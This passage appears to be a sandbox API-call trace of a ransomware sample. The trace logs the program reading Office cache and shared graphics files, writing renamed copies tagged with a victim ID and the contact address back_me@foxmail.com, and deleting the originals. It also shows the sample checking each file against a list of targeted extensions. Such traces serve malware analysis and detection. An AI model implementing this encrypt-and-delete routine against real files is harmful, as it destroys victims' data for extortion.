[0036.530] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.530] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.531] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8 [0036.531] GetLastError () returned 0x0 [0036.531] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x10676, lpOverlapped=0x0) returned 1 [0036.625] WriteFile (in: hFile=0x1f8, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x10680, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x10680, lpOverlapped=0x0) returned 1 [0036.627] ReadFile (in: hFile=0x1a0, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0036.627] WriteFile (in: hFile=0x1f8, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0036.627] SetEndOfFile (hFile=0x1f8) returned 1 [0036.627] CloseHandle (hObject=0x1f8) returned 1 [0036.629] SetFilePointerEx (in: hFile=0x1a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.629] SetEndOfFile (hFile=0x1a0) returned 1 [0036.630] CloseHandle (hObject=0x1a0) returned 1 [0036.630] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0036.630] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.chm")) returned 1 [0036.630] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.631] lstrlenW (lpString=".doc") returned 4 [0036.631] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString=".docx") returned 5 [0036.631] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0036.631] lstrlenW (lpString=".pdf") returned 4 [0036.631] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString=".xls") returned 4 [0036.631] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString=".xlsx") returned 5 [0036.631] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0036.631] lstrlenW (lpString=".ppt") returned 4 [0036.631] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.631] lstrlenW (lpString=".zip") returned 4 [0036.631] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString=".rar") returned 4 [0036.631] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString=".bz2") returned 4 [0036.631] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.631] lstrlenW (lpString=".7z") returned 3 [0036.631] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.631] lstrlenW (lpString=".dbf") returned 4 [0036.631] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.631] lstrlenW (lpString=".1cd") returned 4 [0036.631] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.631] lstrlenW (lpString=".jpg") returned 4 [0036.631] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.632] lstrlenW (lpString=".doc") returned 4 [0036.632] lstrcmpiW (lpString1=".doc", lpString2=".chm") returned 1 [0036.632] lstrlenW (lpString=".docx") returned 5 [0036.632] lstrcmpiW (lpString1=".docx", lpString2="p.chm") returned -1 [0036.632] lstrlenW (lpString=".pdf") returned 4 [0036.632] lstrcmpiW (lpString1=".pdf", lpString2=".chm") returned 1 [0036.632] lstrlenW (lpString=".xls") returned 4 [0036.632] lstrcmpiW (lpString1=".xls", lpString2=".chm") returned 1 [0036.632] lstrlenW (lpString=".xlsx") returned 5 [0036.632] lstrcmpiW (lpString1=".xlsx", lpString2="p.chm") returned -1 [0036.632] lstrlenW (lpString=".ppt") returned 4 [0036.632] lstrcmpiW (lpString1=".ppt", lpString2=".chm") returned 1 [0036.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.632] lstrlenW (lpString=".zip") returned 4 [0036.632] lstrcmpiW (lpString1=".zip", lpString2=".chm") returned 1 [0036.632] lstrlenW (lpString=".rar") returned 4 [0036.632] lstrcmpiW (lpString1=".rar", lpString2=".chm") returned 1 [0036.632] lstrlenW (lpString=".bz2") returned 4 [0036.632] lstrcmpiW (lpString1=".bz2", lpString2=".chm") returned -1 [0036.632] lstrlenW (lpString=".7z") returned 3 [0036.632] lstrcmpiW (lpString1=".7z", lpString2="chm") returned -1 [0036.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.632] lstrlenW (lpString=".dbf") returned 4 [0036.632] lstrcmpiW (lpString1=".dbf", lpString2=".chm") returned 1 [0036.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.632] lstrlenW (lpString=".1cd") returned 4 [0036.632] lstrcmpiW (lpString1=".1cd", lpString2=".chm") returned -1 [0036.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 72 [0036.632] lstrlenW (lpString=".jpg") returned 4 [0036.632] lstrcmpiW (lpString1=".jpg", lpString2=".chm") returned 1 [0036.632] lstrcmpiW (lpString1=".xml", lpString2=".php") returned 1 [0036.632] lstrlenW (lpString="AccessMUI.xml") returned 13 [0036.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.701] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1349) returned 1 [0037.701] CloseHandle (hObject=0x1bc) returned 1 [0037.701] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 0x2020 [0037.701] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.701] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0037.701] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.701] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.701] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0037.701] GetLastError () returned 0x0 [0037.701] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x545, lpOverlapped=0x0) returned 1 [0037.960] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x550, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x550, lpOverlapped=0x0) returned 1 [0037.962] ReadFile (in: hFile=0x1bc, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.964] WriteFile (in: hFile=0x1f0, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xee, lpOverlapped=0x0) returned 1 [0037.964] SetEndOfFile (hFile=0x1f0) returned 1 [0037.965] CloseHandle (hObject=0x1f0) returned 1 [0037.965] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.965] SetEndOfFile (hFile=0x1bc) returned 1 [0037.966] CloseHandle (hObject=0x1bc) returned 1 [0037.966] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0037.967] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml")) returned 1 [0037.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.967] lstrlenW (lpString=".doc") returned 4 [0037.967] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.967] lstrlenW (lpString=".docx") returned 5 [0037.967] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0037.967] lstrlenW (lpString=".pdf") returned 4 [0037.967] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.967] lstrlenW (lpString=".xls") returned 4 [0037.967] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.967] lstrlenW (lpString=".xlsx") returned 5 [0037.967] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0037.967] lstrlenW (lpString=".ppt") returned 4 [0037.967] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.967] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.968] lstrlenW (lpString=".zip") returned 4 [0037.968] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.968] lstrlenW (lpString=".rar") returned 4 [0037.968] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString=".bz2") returned 4 [0037.968] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString=".7z") returned 3 [0037.968] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.968] lstrlenW (lpString=".dbf") returned 4 [0037.968] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.968] lstrlenW (lpString=".1cd") returned 4 [0037.968] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.968] lstrlenW (lpString=".jpg") returned 4 [0037.968] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.968] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.968] lstrlenW (lpString=".doc") returned 4 [0037.968] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString=".docx") returned 5 [0037.968] lstrcmpiW (lpString1=".docx", lpString2="I.xml") returned -1 [0037.968] lstrlenW (lpString=".pdf") returned 4 [0037.968] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString=".xls") returned 4 [0037.968] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0037.968] lstrlenW (lpString=".xlsx") returned 5 [0037.968] lstrcmpiW (lpString1=".xlsx", lpString2="I.xml") returned -1 [0037.969] lstrlenW (lpString=".ppt") returned 4 [0037.969] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0037.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.969] lstrlenW (lpString=".zip") returned 4 [0037.969] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0037.969] lstrlenW (lpString=".rar") returned 4 [0037.969] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0037.969] lstrlenW (lpString=".bz2") returned 4 [0037.969] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0037.969] lstrlenW (lpString=".7z") returned 3 [0037.969] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0037.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.969] lstrlenW (lpString=".dbf") returned 4 [0037.969] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0037.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.969] lstrlenW (lpString=".1cd") returned 4 [0037.969] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0037.969] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 89 [0037.969] lstrlenW (lpString=".jpg") returned 4 [0037.969] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0037.969] lstrcmpiW (lpString1=".EPS", lpString2=".php") returned -1 [0037.969] lstrlenW (lpString="MS.EPS") returned 6 [0037.969] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0037.993] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=15067) returned 1 [0037.993] CloseHandle (hObject=0x1e4) returned 1 [0037.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 0x20 [0037.995] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0037.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0037.995] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.995] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.995] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1ec [0037.996] GetLastError () returned 0x0 [0037.996] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x3adb, lpOverlapped=0x0) returned 1 [0037.997] WriteFile (in: hFile=0x1ec, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0x3ae0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0x3ae0, lpOverlapped=0x0) returned 1 [0037.998] ReadFile (in: hFile=0x1e4, lpBuffer=0x3b10020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x332fed4, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesRead=0x332fed4*=0x0, lpOverlapped=0x0) returned 1 [0037.998] WriteFile (in: hFile=0x1ec, lpBuffer=0x3b10020*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x332fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3b10020*, lpNumberOfBytesWritten=0x332fc9c*=0xe0, lpOverlapped=0x0) returned 1 [0037.999] SetEndOfFile (hFile=0x1ec) returned 1 [0037.999] CloseHandle (hObject=0x1ec) returned 1 [0037.999] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: lpNewFilePointer=0x0) returned 1 [0037.999] SetEndOfFile (hFile=0x1e4) returned 1 [0038.000] CloseHandle (hObject=0x1e4) returned 1 [0038.000] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0038.001] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.eps")) returned 1 [0038.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.001] lstrlenW (lpString=".doc") returned 4 [0038.001] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0038.001] lstrlenW (lpString=".docx") returned 5 [0038.001] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0038.001] lstrlenW (lpString=".pdf") returned 4 [0038.001] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0038.001] lstrlenW (lpString=".xls") returned 4 [0038.001] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0038.001] lstrlenW (lpString=".xlsx") returned 5 [0038.001] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0038.001] lstrlenW (lpString=".ppt") returned 4 [0038.001] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0038.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.001] lstrlenW (lpString=".zip") returned 4 [0038.001] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0038.001] lstrlenW (lpString=".rar") returned 4 [0038.001] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0038.001] lstrlenW (lpString=".bz2") returned 4 [0038.001] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0038.001] lstrlenW (lpString=".7z") returned 3 [0038.001] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0038.001] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.001] lstrlenW (lpString=".dbf") returned 4 [0038.002] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0038.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.002] lstrlenW (lpString=".1cd") returned 4 [0038.002] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0038.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.002] lstrlenW (lpString=".jpg") returned 4 [0038.002] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0038.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.002] lstrlenW (lpString=".doc") returned 4 [0038.002] lstrcmpiW (lpString1=".doc", lpString2=".EPS") returned -1 [0038.002] lstrlenW (lpString=".docx") returned 5 [0038.002] lstrcmpiW (lpString1=".docx", lpString2="S.EPS") returned -1 [0038.002] lstrlenW (lpString=".pdf") returned 4 [0038.002] lstrcmpiW (lpString1=".pdf", lpString2=".EPS") returned 1 [0038.002] lstrlenW (lpString=".xls") returned 4 [0038.002] lstrcmpiW (lpString1=".xls", lpString2=".EPS") returned 1 [0038.002] lstrlenW (lpString=".xlsx") returned 5 [0038.002] lstrcmpiW (lpString1=".xlsx", lpString2="S.EPS") returned -1 [0038.002] lstrlenW (lpString=".ppt") returned 4 [0038.002] lstrcmpiW (lpString1=".ppt", lpString2=".EPS") returned 1 [0038.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.002] lstrlenW (lpString=".zip") returned 4 [0038.002] lstrcmpiW (lpString1=".zip", lpString2=".EPS") returned 1 [0038.002] lstrlenW (lpString=".rar") returned 4 [0038.002] lstrcmpiW (lpString1=".rar", lpString2=".EPS") returned 1 [0038.002] lstrlenW (lpString=".bz2") returned 4 [0038.002] lstrcmpiW (lpString1=".bz2", lpString2=".EPS") returned -1 [0038.002] lstrlenW (lpString=".7z") returned 3 [0038.002] lstrcmpiW (lpString1=".7z", lpString2="EPS") returned -1 [0038.002] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.003] lstrlenW (lpString=".dbf") returned 4 [0038.003] lstrcmpiW (lpString1=".dbf", lpString2=".EPS") returned -1 [0038.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.003] lstrlenW (lpString=".1cd") returned 4 [0038.003] lstrcmpiW (lpString1=".1cd", lpString2=".EPS") returned -1 [0038.003] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.EPS") returned 61 [0038.003] lstrlenW (lpString=".jpg") returned 4 [0038.003] lstrcmpiW (lpString1=".jpg", lpString2=".EPS") returned 1 [0038.003] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0038.003] lstrlenW (lpString="MS.PNG") returned 6 [0038.003] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0038.004] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x332ff1c | out: lpFileSize=0x332ff1c*=1682) returned 1 [0038.004] CloseHandle (hObject=0x1e4) returned 1 [0038.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png")) returned 0x20 [0038.004] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0038.004] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0038.004] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x332fec8 | out: 